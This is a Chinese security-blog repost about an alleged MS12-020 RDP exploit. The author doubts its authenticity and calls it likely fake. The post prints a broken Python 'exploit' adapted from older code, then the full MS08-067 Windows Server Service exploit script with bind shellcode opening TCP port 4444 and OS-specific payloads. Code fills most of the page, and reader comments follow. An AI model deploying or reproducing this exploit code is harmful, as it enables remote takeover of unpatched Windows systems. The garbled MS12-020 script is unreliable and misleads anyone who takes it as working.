MS12-020 Exp,MS12-020.exe,MS12-020 漏洞利用程序

admin
admin
admin
137432
文章
113
评论
2021年4月3日20:02:10评论156 views字数 12561阅读41分52秒阅读模式

2012-3-17 7:21:11 补充:真正的利用程序已经出来了,见:关于 MS12-020 的非专业分析 [附真正的 ruby 利用脚本]

从前天“MS12-020 远程桌面(RDP)远程执行代码漏洞”出来以来,已经有数个版本的“利用程序”在网上流传,有批处理版的、py 版的,这又是一个版本的,以下内容转载于互联网,真实性未测,请自行判断!

貌似是个假的,目测就是那个 py,目测和2008年一漏洞的代码极其相似:http://www.1337day.com/exploits/9303

需要安装 FREERDP

这个貌似就是大家苦苦寻找的 ms12-020 exp

下载地址:http://115.com/file/anmgwyzh

视频地址:http://good.gd/1975261.htm

FREERDP 模块:https://github.com/FreeRDP/FreeRDP/downloads

转载于Dis9

标签: FREERDP 地址 http 貌似 downloads

MS12-020: 远程桌面中允许远程执行代码漏洞

这是网上流传的 ms12-020 exp py 版本代码: 

#!/usr/bin/env python
#############################################################################
#   MS12-020 Exploi
#
#   Uses FreeRDP
#############################################################################

import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import  rdpNego

#bind shellcode TCP port 4444
shellcode  = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode += 'x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9'
shellcode += 'x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56'
shellcode += 'x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22'
shellcode += 'xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30'
shellcode += 'x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81'
shellcode += 'x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42'
shellcode += 'xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22'
shellcode += 'xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9'
shellcode += 'x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79'
shellcode += 'x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab'
shellcode += 'xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa'
shellcode += 'xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48'
shellcode += 'x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1'
shellcode += 'x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0'
shellcode += 'xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe'
shellcode += 'x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9'
shellcode += 'xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84'
shellcode += 'x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56'
shellcode += 'x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8'
shellcode += 'x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79'
shellcode += 'x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6'
shellcode += 'xbaxb5x60x56x39x4axb6xa9'

#Payload
payload  = 'x41x00x5cx00'
payload += 'xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49'
payload += 'x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax68'
payload += 'x58x30x41x31x50x42x41x6bx42x41x78x42x32x42x41x32'
payload += 'x41x41x30x41x41x58x38x42x42x50x75x4bx59x49x6cx43'
payload += 'x5ax7ax4bx32x6dx5ax48x5ax59x69x6fx4bx4fx39x6fx71'
payload += 'x70x6ex6bx62x4cx44x64x71x34x4cx4bx62x65x75x6cx4c'
payload += 'x4bx63x4cx76x65x70x78x35x51x48x6fx6cx4bx50x4fx74'
payload += 'x58x6ex6bx33x6fx55x70x37x71x48x6bx57x39x6cx4bx66'
payload += 'x54x6ex6bx46x61x7ax4ex47x41x6bx70x7ax39x4cx6cx4c'
payload += 'x44x6fx30x62x54x44x47x38x41x4bx7ax54x4dx44x41x4b'
payload += 'x72x78x6bx39x64x35x6bx53x64x75x74x46x48x72x55x79'
payload += 'x75x6cx4bx53x6fx76x44x44x41x48x6bx35x36x4ex6bx54'
payload += 'x4cx30x4bx6cx4bx51x4fx65x4cx65x51x38x6bx77x73x36'
payload += 'x4cx4ex6bx6ex69x30x6cx66x44x45x4cx30x61x69x53x30'
payload += 'x31x79x4bx43x54x6cx4bx63x73x44x70x4ex6bx77x30x66'
payload += 'x6cx6cx4bx72x50x45x4cx4cx6dx4ex6bx73x70x64x48x73'
payload += 'x6ex55x38x6ex6ex32x6ex34x4ex58x6cx62x70x39x6fx6b'
payload += 'x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63'
payload += 'x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a'
payload += 'x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f'
payload += 'x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73'
payload += 'x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c'
payload += 'x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70'
payload += 'x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61'
payload += 'x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33'
payload += 'x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32'
payload += 'x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e'
payload += 'x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39'
payload += 'x6fx78x50x33x58x6bx55x51x59x4ex66x50x49x51x47x39'
payload += 'x6fx48x56x32x70x32x74x62x74x46x35x4bx4fx38x50x6e'
payload += 'x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e'
payload += 'x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51'
payload += 'x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64'
payload += 'x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37'
payload += 'x41x6bx70x7ax53x6ex4ax69x6ex32x62x46x4dx6bx4ex70'
payload += 'x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e'
payload += 'x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73'
payload += 'x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61'
payload += 'x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78'
payload += 'x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e'
payload += 'x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30'
payload += 'x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b'
payload += 'x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b'
payload += 'x4fx69x46x4bx4fx6ex30x68';

class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target

    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\x00\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target

        # Making teh packet
        self.__stub='x01x00x00x00'
        self.__stub+='xd6x00x00x00x00x00x00x00xd6x00x00x00'
        self.__stub+=shellcode
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x00x00x00x00'
        self.__stub+='x2fx00x00x00x00x00x00x00x2fx00x00x00'
        self.__stub+=payload
        self.__stub+='x00x00x00x00'
        self.__stub+='x02x00x00x00x02x00x00x00'
        self.__stub+='x00x00x00x00x02x00x00x00'
        self.__stub+='x5cx00x00x00x01x00x00x00'
        self.__stub+='x01x00x00x00x90x90xb0x53x6bxC0x28x03xd8xffxd3'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...nTelnet to port 4444 on target machine.'

if __name__ == '__main__':
      	target = sys.argv[1]
      	print 'nUsage: %s  n' % sys.argv[0]
        sys.exit(-1)

current = SRVSVC_Exploit(target)
current.start()

这是 2008 年的那个漏洞 Py 代码,目测二者极其相似,MS Windows Server Service Code Execution Exploit (MS08-067): 

====================================================================
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
====================================================================

#!/usr/bin/env python
#############################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#############################################################################

import struct
import sys

from threading import Thread    #Thread is imported incase you would like to modify
                                #the src to run against multiple targets.

try:
    from impacket import smb
    from impacket import uuid
    from impacket.dcerpc import dcerpc
    from impacket.dcerpc import transport
except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
    sys.exit(1)


print '#######################################################################'
print '#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '#   www.hackingspirits.com'
print '#   www.coffeeandsecurity.com'
print '#   Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################n'


#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode  = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
shellcode += "x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9"
shellcode += "x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56"
shellcode += "x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22"
shellcode += "xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30"
shellcode += "x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81"
shellcode += "x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42"
shellcode += "xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22"
shellcode += "xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9"
shellcode += "x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79"
shellcode += "x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab"
shellcode += "xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa"
shellcode += "xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48"
shellcode += "x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1"
shellcode += "x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0"
shellcode += "xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe"
shellcode += "x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9"
shellcode += "xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84"
shellcode += "x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56"
shellcode += "x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8"
shellcode += "x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79"
shellcode += "x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6"
shellcode += "xbaxb5x60x56x39x4axb6xa9"


#Payload for Windows 2000 target
payload_1='x41x00x5cx00x2ex00x2ex00x5cx00x2ex00x2ex00x5cx00'
payload_1+='x41x41x41x41x41x41x41x41'
payload_1+='x41x41x41x41x41x41x41x41'
payload_1+='x41x41'
payload_1+='x2fx68x18x00x8bxc4x66x05x94x04x8bx00xffxe0'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='xebxcc'
payload_1+='x00x00'

#Payload for Windows 2003[SP2] target
payload_2='x41x00x5cx00'
payload_2+='x2ex00x2ex00x5cx00x2ex00'
payload_2+='x2ex00x5cx00x0ax32xbbx77'
payload_2+='x8bxc4x66x05x60x04x8bx00'
payload_2+='x50xffxd6xffxe0x42x84xae'
payload_2+='xbbx77xffxffxffxffx01x00'
payload_2+='x01x00x01x00x01x00x43x43'
payload_2+='x43x43x37x48xbbx77xf5xff'
payload_2+='xffxffxd1x29xbcx77xf4x75'
payload_2+='xbdx77x44x44x44x44x9exf5'
payload_2+='xbbx77x54x13xbfx77x37xc6'
payload_2+='xbax77xf9x75xbdx77x00x00'


if sys.argv[2]=='1':    #Windows 2000 Payload
    payload=payload_1
    print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2':    #Windows 2003[SP2] Payload
    payload=payload_2
    print '[-]Windows 2003[SP2] payload loaded'


class SRVSVC_Exploit(Thread):
    def __init__(self, target, osver, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
        self.osver   = osver

    def __DCEPacket(self):
        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\pipe\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\pipe\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
        
        # Constructing Malicious Packet
        self.__stub='x01x00x00x00'
        self.__stub+='xd6x00x00x00x00x00x00x00xd6x00x00x00'
        self.__stub+=shellcode
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x00x00x00x00'
        self.__stub+='x2fx00x00x00x00x00x00x00x2fx00x00x00'
        self.__stub+=payload
        self.__stub+='x00x00x00x00'
        self.__stub+='x02x00x00x00x02x00x00x00'
        self.__stub+='x00x00x00x00x02x00x00x00'
        self.__stub+='x5cx00x00x00x01x00x00x00'
        self.__stub+='x01x00x00x00'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)   #0x1f (or 31)- NetPathCanonicalize Operation
        print '[-]Exploit sent to target successfully...n[1]Telnet to port 4444 on target machine...'

if __name__ == '__main__':
       try:
               target = sys.argv[1]
               osver = sys.argv[2]
       except IndexError:
               print 'nUsage: %s n' % sys.argv[0]
               print 'Example: srvsvcexpl.py 192.168.1.1 2n'
               print 'Select OS Version'
               print '[-]Windows 2000: OS Version = 1'
               print '[-]Windows 2003[SP2]: OS Version = 2'

               sys.exit(-1)

current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...n[-]Telnet to port 4444 on target machine...'

# 1337day.com [2008-11-16]

留言评论(旧系统):

【匿名者】 @ 2012-03-15 16:53:07

好象不是.exe版本的吧?? .py的不知道用 老大可把他搞成.exe吗?

本站回复:

擦,你不知道 py 可以编译的么。。。

【匿名者】 @ 2012-03-15 17:11:44

怎么到处发的图都是这个.exe 发的exp 都这个这个.py 为什么不是那图里的.exe 无奈了。

本站回复:

我也不清楚,假货横行……

【匿名者】 @ 2012-03-15 17:19:19

没linux环境,,windows下怎么运行.py呢。请老大赐教!

本站回复:

py 官方有安装包下载啊,完全支持 Windows,具体的你搜搜,我之前在 Win Xp、Win 7 上都用过 py。

【匿名者】 @ 2012-03-15 17:32:27

不知道老大,你是否测试这个exp ? 如果测试了 效果怎么样?

本站回复:

我压根就没测试,90% 是假的,各种假版本乱飞。。。。

【匿名者】 @ 2012-03-15 17:39:13

我装了个 python 运行看了下

C:>ms12-020.py
File "C:ms12-020.py", line 93
print '[-]Connecting'
^
SyntaxError: invalid syntax

好象有错误。。。我估计也是假的吧。哎 出了个漏洞自己没能力搞exp真是郁闷啊,

本站回复:

这个错误提示是:语法错误,py 我不是很懂,具体的你网上看看。

【匿名者】 @ 2012-03-16 22:02:46

纯tm扯淡啊 ~~~~sb才信啊, 3389 0day 就算有也在军方手中

本站回复:

漏洞是真的,0day 也是有的,不过目前网上流传的全是假的,真的流传出来只是时间问题。

佚名 @ 2013-04-11 08:48:17

这个去年很火啊。核总这啥都有- -。
貌似修改了3389端口就无法攻击了是么?

本站回复:

修改端口无任何作用。

文章来源于lcx.cc:MS12-020 Exp,MS12-020.exe,MS12-020 漏洞利用程序

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:02:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MS12-020 Exp,MS12-020.exe,MS12-020 漏洞利用程序https://cn-sec.com/archives/324994.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息